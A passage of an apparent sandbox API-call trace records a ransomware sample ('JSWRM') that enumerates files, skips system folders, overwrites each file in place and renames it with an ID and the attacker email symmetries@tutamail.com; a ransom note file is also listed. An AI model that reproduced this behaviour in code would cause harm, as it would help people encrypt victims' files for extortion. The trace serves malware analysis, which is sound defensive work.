nFileSizeHigh=0x0, nFileSizeLow=0x9c, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="GetCurrentRollback.ini", cAlternateFileName="GETCUR~1.INI")) returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2=".") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="..") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="...") returned 1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="windows") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="recovery") returned -1 [0058.284] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="perflogs") returned -1 [0058.285] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="documents and settings") returned 1 [0058.285] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="$RECYCLE.BIN") returned 1 [0058.285] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="system volume information") returned -1 [0058.285] lstrcmpiW (lpString1="GetCurrentRollback.ini", lpString2="msocache") returned -1 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x240fe8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 22 [0058.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GetCurrentRollback.ini", cchWideChar=22, lpMultiByteStr=0x241100, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentRollback.ini", lpUsedDefaultChar=0x0) returned 22 [0058.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232f58 [0058.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ae0 | out: hHeap=0x1e0000) returned 1 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.285] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0058.285] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0058.287] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=156) returned 1 [0058.287] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.287] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0058.287] ReadFile (in: hFile=0x454, lpBuffer=0x23b400, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesRead=0x345f2d4*=0x90, lpOverlapped=0x0) returned 1 [0058.288] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.288] WriteFile (in: hFile=0x454, lpBuffer=0x23b400*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23b400*, lpNumberOfBytesWritten=0x345f2d0*=0x90, lpOverlapped=0x0) returned 1 [0058.288] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.288] CloseHandle (hObject=0x454) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0058.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0058.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216ac0 [0058.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.289] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216ac0 | out: hHeap=0x1e0000) returned 1 [0058.289] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.289] MoveFileW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\GetCurrentRollback.ini.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\$getcurrent\\safeos\\getcurrentrollback.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0058.290] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1966ae7d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1966ae7d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1966ae7d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0058.290] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0058.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0058.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.290] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.290] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.290] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232f58 | out: hHeap=0x1e0000) returned 1 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0058.291] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x54acc791, ftLastAccessTime.dwHighDateTime=0x1d3273a, ftLastWriteTime.dwLowDateTime=0x54acc791, ftLastWriteTime.dwHighDateTime=0x1d3273a, nFileSizeHigh=0x0, nFileSizeLow=0x241, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="PartnerSetupComplete.cmd", cAlternateFileName="PARTNE~1.CMD")) returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2=".") returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="..") returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="...") returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="windows") returned -1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="recovery") returned -1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="perflogs") returned -1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="documents and settings") returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="$RECYCLE.BIN") returned 1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="system volume information") returned -1 [0058.291] lstrcmpiW (lpString1="PartnerSetupComplete.cmd", lpString2="msocache") returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 24 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PartnerSetupComplete.cmd", cchWideChar=24, lpMultiByteStr=0x240ef8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PartnerSetupComplete.cmd", lpUsedDefaultChar=0x0) returned 24 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0058.291] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.291] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0058.292] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0058.292] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=577) returned 1 [0058.292] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x240) returned 0x21b138 [0058.292] ReadFile (in: hFile=0x454, lpBuffer=0x21b138, nNumberOfBytesToRead=0x240, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x21b138*, lpNumberOfBytesRead=0x345f2d4*=0x240, lpOverlapped=0x0) returned 1 [0058.294] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.294] WriteFile (in: hFile=0x454, lpBuffer=0x21b138*, nNumberOfBytesToWrite=0x240, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x21b138*, lpNumberOfBytesWritten=0x345f2d0*=0x240, lpOverlapped=0x0) returned 1 [0058.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21b138 | out: hHeap=0x1e0000) returned 1 [0058.294] CloseHandle (hObject=0x454) returned 1 [0058.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0058.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.294] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0058.295] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0058.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0058.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2179e0 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0058.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2179e0 | out: hHeap=0x1e0000) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.295] MoveFileW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\PartnerSetupComplete.cmd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\$getcurrent\\safeos\\partnersetupcomplete.cmd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0058.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0058.295] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9575af11, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9577d1ec, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x4a, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="preoobe.cmd", cAlternateFileName="")) returned 1 [0058.295] lstrcmpiW (lpString1="preoobe.cmd", lpString2=".") returned 1 [0058.295] lstrcmpiW (lpString1="preoobe.cmd", lpString2="..") returned 1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="...") returned 1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="windows") returned -1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="recovery") returned -1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="perflogs") returned 1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="documents and settings") returned 1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="$RECYCLE.BIN") returned 1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="system volume information") returned -1 [0058.296] lstrcmpiW (lpString1="preoobe.cmd", lpString2="msocache") returned 1 [0058.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="preoobe.cmd", lpUsedDefaultChar=0x0) returned 11 [0058.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0058.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="preoobe.cmd", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="preoobe.cmd", lpUsedDefaultChar=0x0) returned 11 [0058.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0058.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.296] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0058.296] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.551] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=74) returned 1 [0058.551] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.551] ReadFile (in: hFile=0x3d4, lpBuffer=0x20dde8, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x20dde8*, lpNumberOfBytesRead=0x345f2d4*=0x40, lpOverlapped=0x0) returned 1 [0058.552] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.552] WriteFile (in: hFile=0x3d4, lpBuffer=0x20dde8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x20dde8*, lpNumberOfBytesWritten=0x345f2d0*=0x40, lpOverlapped=0x0) returned 1 [0058.552] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.552] CloseHandle (hObject=0x3d4) returned 1 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0058.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, 